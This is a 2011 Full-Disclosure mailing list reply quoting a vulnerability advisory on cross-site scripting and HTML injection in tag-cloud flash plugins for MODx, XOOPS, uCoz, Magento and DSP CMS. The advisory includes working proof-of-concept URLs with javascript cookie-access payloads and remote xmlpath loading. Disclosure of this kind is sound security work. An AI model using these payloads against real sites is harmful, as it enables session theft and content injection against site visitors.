[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CALo60Kk1V4w_0tohP_iDvtBja0LUqcROLyM74xBriNPpfQJ6aQ@mail.gmail.com>
Date: Mon, 26 Dec 2011 17:44:32 -0500
From: Antony widmal <antony.widmal@...il.com>
To: MustLive <mustlive@...security.com.ua>
Cc: full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org
Subject: Re: Vulnerabilities in plugins for MODx CMS, XOOPS,
uCoz, Magento and DSP CMS
10 million XSS !
Thank you Santa.
2011/12/26 MustLive <mustlive@...security.com.ua>
> Hello list!
>
> Besides tens millions of vulnerable web sites with affected flash files and
> vulnerable multiple plugins for different engines, which I've wrote about
> earlier, there are a lot of other vulnerable plugins. Here are new ones
> (some of them are vulnerable to two XSS holes). There are Cross-Site
> Scripting vulnerabilities in plugins for engines MODx CMS, XOOPS, uCoz,
> Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such
> plugins for other engines can be vulnerable.
>
> This XSS is similar to XSS vulnerability in WP-Cumulus, which I've
> disclosed
> in 2009 (http://securityvulns.com/Wdocument842.html). Because these
> plugins
> are using tagcloud.swf made by author of WP-Cumulus. About such
> vulnerabilities I wrote in 2009-2011, particularly about millions of flash
> files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
> article XSS vulnerabilities in 34 millions flash files
> (
> http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html
> ).
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are all versions of Tagcloud for MODx CMS.
>
> Vulnerable is Сumulus for XOOPS 1.0, which is also included in
> ExtendedPackRU for XOOPS.
>
> Vulnerable are all versions of uCoz-Cumulus for uCoz.
>
> Vulnerable are all versions of Cumulus Tagcloud for Magento.
>
> Vulnerable are all versions of Сumulus for DSP CMS.
>
> Some of these plugins are vulnerable to one and some to two XSS holes - as
> to first hole in WP-Cumulus, which I've disclosed in 2009, as to second
> hole, which I've disclosed in 2011.
>
> Besides these ones and those which I've disclosed in 2009-2011, a lot of
> other such plugins for other engines can be vulnerable.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> Tagcloud for MODx CMS:
>
>
> http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Сumulus for XOOPS:
>
>
> http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> uCoz-Cumulus for uCoz:
>
>
> http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Cumulus Tagcloud for Magento:
>
>
> http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
>
> http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml
>
> http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml
>
> Via parameters mode and xmlpath.
>
> Сumulus for DSP CMS:
>
>
> http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Code will execute after click. It's strictly social XSS
> (http://websecurity.com.ua/5476/). Also it's possible to conduct (like in
> WP-Cumulus) HTML Injection attack.
>
> -------------------------------------------------
> Plugins with fixed version of swf-file:
> -------------------------------------------------
>
> Because in November 2009, after my informing, Roy Tanck (developer of
> WP-Cumulus) fixed only XSS vector, but not HTML Injection vector, it's
> still
> possible to conduct HTML Injection attacks (for injecting arbitrary links)
> to all versions of this swf-file (which can be found under name
> tagcloud.swf
> and other names). Including fixed version of the swf-file, with fixed XSS
> hole.
>
> So all those plugins, which developers fixed this vulnerability (after my
> informing or by informing from Roy or other people) by updating swf-file,
> are still vulnerable to HTML Injection. These five plugins are using
> non-fixed version of swf-file.
>
> I mentioned about these vulnerabilities at my site:
> http://websecurity.com.ua/5601/
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists